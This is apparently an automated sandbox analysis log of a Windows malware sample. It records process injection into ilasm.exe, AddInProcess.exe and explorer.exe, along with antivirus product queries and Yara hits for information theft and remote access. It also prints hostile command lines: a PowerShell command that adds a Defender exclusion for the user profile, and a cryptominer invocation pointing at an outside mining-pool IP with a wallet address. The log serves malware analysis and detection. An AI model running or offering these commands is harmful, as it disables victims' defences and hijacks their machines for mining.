Source: C:\Users\user\KPn7VgIWQj.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile Jump to behavior
Source: C:\Users\user\KPn7VgIWQj.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile Jump to behavior
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe Memory allocated: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe base: 140000000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\KPn7VgIWQj.exe Memory allocated: C:\Windows\explorer.exe base: 140000000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe base: 140000000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140000000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140000000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140000000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140000000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\KPn7VgIWQj.exe Memory written: C:\Windows\explorer.exe base: 140000000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\KPn7VgIWQj.exe Memory written: PID: 7760 base: 140000000 value: 4D Jump to behavior
Source: C:\Users\user\KPn7VgIWQj.exe Memory written: PID: 7760 base: 140002000 value: 48 Jump to behavior
Source: C:\Users\user\KPn7VgIWQj.exe Memory written: PID: 7760 base: 1400A0000 value: 00 Jump to behavior
Source: C:\Users\user\KPn7VgIWQj.exe Memory written: PID: 7760 base: 8B6010 value: 00 Jump to behavior
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe Thread register set: target process: 7180 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Thread register set: target process: 7476 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Thread register set: target process: 7572 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Thread register set: target process: 7600 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Thread register set: target process: 7608 Jump to behavior
Source: C:\Users\user\KPn7VgIWQj.exe Thread register set: target process: 7760 Jump to behavior
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe base: 140000000 Jump to behavior
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe base: 140002000 Jump to behavior
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe base: 1400A0000 Jump to behavior
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe base: 72DF49B010 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140000000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140001000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 14037F000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1404EA000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 14079A000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BA000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BB000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BE000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C0000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C1000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C7000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 29BC295010 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140000000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140001000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 14037F000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1404EA000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 14079A000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BA000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BB000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BE000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C0000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C1000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C7000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: F4D2CA3010 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140000000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140001000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 14037F000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1404EA000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 14079A000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BA000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BB000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BE000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C0000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C1000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C7000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 4BCB5DC010 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140000000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140001000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 14037F000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1404EA000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 14079A000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BA000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BB000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BE000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C0000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C1000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C7000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: CCB7D23010 Jump to behavior
Source: C:\Users\user\KPn7VgIWQj.exe Memory written: C:\Windows\explorer.exe base: 140000000 Jump to behavior
Source: C:\Users\user\KPn7VgIWQj.exe Memory written: C:\Windows\explorer.exe base: 140002000 Jump to behavior
Source: C:\Users\user\KPn7VgIWQj.exe Memory written: C:\Windows\explorer.exe base: 1400A0000 Jump to behavior
Source: C:\Users\user\KPn7VgIWQj.exe Memory written: C:\Windows\explorer.exe base: 8B6010 Jump to behavior
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile Jump to behavior
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 185.196.10.233:35662 -u ZEPHs72fKDmidnGGBpgHXJHNdpe49PRJa1tvHRycwAPy9VLQpybiQf527biDskd3jSJyDZY5UbzexC3Fnoxu4rBvgyx1b5vnkJf.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 185.196.10.233:35662 -u ZEPHs72fKDmidnGGBpgHXJHNdpe49PRJa1tvHRycwAPy9VLQpybiQf527biDskd3jSJyDZY5UbzexC3Fnoxu4rBvgyx1b5vnkJf.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 185.196.10.233:35662 -u ZEPHs72fKDmidnGGBpgHXJHNdpe49PRJa1tvHRycwAPy9VLQpybiQf527biDskd3jSJyDZY5UbzexC3Fnoxu4rBvgyx1b5vnkJf.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 185.196.10.233:35662 -u ZEPHs72fKDmidnGGBpgHXJHNdpe49PRJa1tvHRycwAPy9VLQpybiQf527biDskd3jSJyDZY5UbzexC3Fnoxu4rBvgyx1b5vnkJf.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50 Jump to behavior
Source: C:\Users\user\KPn7VgIWQj.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile Jump to behavior
Source: C:\Users\user\KPn7VgIWQj.exe Process created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Queries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe Code function: 0_2_00007FF68BBEE180 QueryPerformanceFrequency,GetSystemTimeAsFileTime,QueryPerformanceCounter, 0_2_00007FF68BBEE180
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

barindex
Source: Yara match File source: 6.2.ilasm.exe.203fce70000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.ilasm.exe.203fce70000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.3913939775.00000203FCE70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 6.2.ilasm.exe.203fce70000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.ilasm.exe.203fce70000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.3913939775.00000203FCE70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

barindex
Source: Yara match File source: 6.2.ilasm.exe.203fce70000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.ilasm.exe.203fce70000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.3913939775.00000203FCE70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 6.2.ilasm.exe.203fce70000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.ilasm.exe.203fce70000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.3913939775.00000203FCE70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs